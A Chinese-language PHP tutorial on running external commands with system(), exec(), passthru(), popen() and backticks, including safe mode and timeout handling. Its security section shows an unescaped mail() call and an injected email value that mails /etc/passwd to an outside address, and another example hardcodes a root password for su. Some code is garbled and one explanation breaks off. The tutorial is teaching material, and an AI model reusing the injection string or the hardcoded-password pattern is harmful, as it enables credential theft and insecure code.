PHP和其它的程式設計語言一樣,完全可以在程式內呼叫外部命令,並且是很簡單的:只要用一個或幾個函數即可。 前提條件 由於PHP基本上是用於WEB程式開發的,所以安全性成了人們考慮的一個重要面向。 於是PHP的設計者們為PHP加了一個門:安全模式。 如果運行在安全模式下,那麼PHP腳本將受到以下四個方面的限制: 1、執行外部命令 2、在開啟檔案時有些限制 3.連接mysql資料庫 4、基於HTTP的認證在 安全模式下,只有在特定目錄中的外部程式才可以被執行,對其它程式的呼叫將被拒絕。 這個目錄可以在php.ini檔中用 safe_mode_exec_dir指令,或是在編譯PHP是加上 --with-exec-dir選項來指定,預設是 /usr/local/php/bin。 如果你呼叫一個應該可以輸出結果的外部指令(意思是PHP腳本沒有錯誤),得到的卻是一片空白,那麼很可能PHP在安全模式下運作。 在PHP中呼叫外部指令,可以用以下三種方法來實作: 1) 用PHP提供的專門函數 PHP提供共了3個專門的執行外部指令的函數:system(),exec(),passthru()。 1、system() 原型:string system (string command [, int return_var]) system()函數很其它語言中的差不多,它執行給定的命令,輸出和傳回結果。第二個參數是可選的,用來得到指令執行後的狀態碼。 範例: <?php system("/usr/local/bin/webalizer/webalizer"); ?> 2、exec() 原型:string exec (string command [, string array [, int return_var]]) exec ()函數與system()類似,也執行給定的命令,但不輸出結果,而是傳回結果的最後一行。雖然它只會傳回命令結果的最後一行,但用第二個參數array 可以得到完整的結 果,方法是把結 果逐行追加到array的結尾處。所以如果array不是空的,在呼叫之前最好用unset()最它清除。只有指定了第二 個參數時,才可以用第三個參數,用來取得指令執行的狀態碼 。 範例: <?php exec("/bin/ls -l"); exec("/bin/ls -l", $res); exec("/bin/ls -l", $res, $rc); ?> 3、passthru() 原型:void passthru (string command [, int return_var]) passthru ()只呼叫指令,不回傳任何結果,但把指令的運作結果原樣直接輸出到標準輸出設備上。所以passthru()函數常用來呼叫象pbmplus (Unix下的一個處理圖片 的工具,輸出二 進制的原始圖片的流)這樣的程式。同樣它也可以得到指令執行的狀態碼。 範例: <?php header("Content-type: image/gif"); passthru("./ppmtogif hunte.ppm"); ?> 2)、用popen()函數開啟進程 上面的方法只能簡單地執行指令,卻不能與指令互動。 有時須向指令輸入一些東西,如在增加Linux的系統使用者時,要呼叫su來把目前使用者換到root才行,而su指令必須要在指令列 上輸入root的密碼。這種情況下,用上面提到的方法顯然是不行的。 popen ()函數開啟一個進程管道來執行給定的命令,傳回一個檔案句柄。既然回傳的是一個檔案句柄,那麼就可以對它讀和寫了。在PHP3中,對此句柄只能做單一 的操作 模式,要嘛寫,要嘛讀;從PHP4開始,可以同時讀寫了。 除非這個句柄是以一種模式(讀取或寫入)打開的,否則必須呼叫pclose()函數來關閉 它。 範例1: <?php $fp=popen("/bin/ls -l", "r"); ?> 範例2: <?php $sucommand = "su --login root --command"; $useradd = "useradd "; $rootpasswd = "verygood"; $user = "james"; $user_add = sprintf("%s "%s %s"",$sucommand,$useradd,$user); $fp = @popen($user_add,"w"); @fputs($fp,$rootpasswd); @pclose($fp); ?> 3)、用反撇號(`,也就是鍵盤上ESC鍵下面的那個,和~在同一個上面) 這個方法以前沒有歸入PHP的文檔,是作為一個秘技存在的。 用兩個反撇號把要執行的指令括起來當作一個表達式,這個表達式的值就是指令執行的結果。 例如: <?php $res='/bin/ls -l'; echo ' '.$res.' '; ?> 輸出結果: hunte.gif hunte.ppm jpg.htm jpg.jpg passthru.php需要考慮兩個問題:安全性和超時。 安全性。 例如,有一家小型的網上商店,所以可以出售的產品清單放在一個文件中。 寫一個有表單的HTML文件,讓你的使用者輸入他們的EMAIL地 址,然後把這個產品清單發給他們。 假設沒有使用PHP的mail()函數(或從未聽過),就呼叫Linux/Unix系統的mail程式來傳送此檔案。 例如: <?php system("mail $to < products.txt"); echo "产品目录已经发送到你的信箱:$to"; ?> 此程式碼其實存在著非常大的安全漏洞。 如果有惡意的使用者輸入了這樣一個EMAIL位址: '--bla ; mail someone@domain.com < /etc/passwd ;' 則這條指令最後變成: 'mail --bla ; mail someone@domain.com < /etc/passwd ; < products.txt' 很恐怖吧,千萬不要在自己的電腦上試,否則後果不是你想像的惡劣。 php提供了两个函数:EscapeShellCmd()和EscapeShellArg()。 函数EscapeShellCmd把一个字符串 中所有可能瞒过Shell而去执行另外一个命令的字符转义。这些字符在Shell 中是有特殊含义的,象分号(),重定向(>)和从文件读入 ( 再说下超时问题。 如果要执行的命令要花费很长的时间,那么应该把这个命令放到系统的后台去运行。 默认情况下,象system()等函数要等到这个命令运行完才返回(实际上是要等命令的输出结果),这肯定会引起PHP脚本的超时。 解决方法,把命令的输出重定向到另外一个文件或流中。 例如: <?php system("/usr/local/bin/order_proc > /tmp/null &"); ?> |